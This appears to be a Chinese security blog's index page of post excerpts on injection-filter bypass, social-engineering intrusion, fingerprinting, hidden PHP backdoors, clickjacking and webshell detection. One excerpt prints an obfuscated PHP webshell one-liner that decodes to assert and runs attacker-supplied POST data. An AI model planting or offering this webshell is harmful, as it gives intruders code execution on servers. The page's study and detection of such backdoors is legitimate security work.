显示不全请点击全屏阅读 原文地址:http://bbs.10hst.com/viewthread.php?tid=39&extra=page%3D1 作者:ay暗影 ======绕过防注入系统...
Seay信息安全博客
Seay信息安全博客
Seay信息安全博客
PHP一句话:自写一个PHP免杀一句话 |
显示不全请点击全屏阅读 最近在写查杀的工具,整理了一些免杀的一句话,顺便自己写了个 <?php $a=str_rot13(‘nffreg’);$a($_POST);?&g...
Seay信息安全博客
社工实例:社工渗透linux安全网全过程 |
显示不全请点击全屏阅读 好久没发原创了,这几天准备送上几篇!祝各位朋友新年快乐。 前天在网上找东西就无意进入了linux安全网,闲着无事就有想入侵它的冲动,其实大多数人感觉这些站都很...
指纹识别:浅谈web指纹识别技术 |
显示不全请点击全屏阅读 目前网络上开源的web指纹识别程序很多,如Wapplyzer,BlindElephant,plecost,w3af,whatweb, wpscan, joomscan等等,基本...
Seay信息安全博客
免杀后门:记一次发现利用preg_replace隐藏后门和
显示不全请点击全屏阅读 php后门有很多,包子也见多了和玩多了,但是在一次帮助朋友检查服务器的时候,竟然发现这样的恶意代码。 事情是这样的,朋友的网站的利用各种查找后门的工具都没有发现php木马。...
Seay信息安全博客
加密科普:转译 几种常见的hash加密 |
显示不全请点击全屏阅读 常见的hash加密(来自国外某论坛) —————*nix系————&...
Seay信息安全博客
安全审计:对防注入代码的分析 |
显示不全请点击全屏阅读 前几天一个朋友让我帮他检测一下他网站程序的安全,为了不让我的面子掉一地只有硬着头皮帮他检测啦! 拿到他的源程序之后就开始我的检测之路啦! 首先我在网站的onews.asp里...
Seay信息安全博客
点击劫持:猥琐流之 关注我吧 |
显示不全请点击全屏阅读 主要说一下问世多年缺一直没被重视的”点击劫持”. 应用场景: 1.社区的关注功能,在WEB2.0时代”关注我”已经成为一个社区必备功能,被关注的愈多在社区的影响力往往也愈大. ...
Seay信息安全博客
原创工具:Python Webshell后门查杀工具源码+C# 服务
显示不全请点击全屏阅读 正在学习python,前段时间无聊写的一个小工具,可以直接运行,也可以带参数运行,具体自己玩玩吧,C#也写了一个,但是远远比这个强大, 功能列表: 1.后门查杀——webshe...
Seay信息安全博客
推荐新书:Web前端黑客技术揭秘 By 知道创宇 余弦
显示不全请点击全屏阅读 刚好准备研究下WEB前端这方面的东西,就看到余弦大哥的《Web前端黑客技术揭秘》发售,看了下目录很不错啊,立马订一本。 余弦大哥人不错啊,上次去知道创宇面试,就是余弦面的,学到...
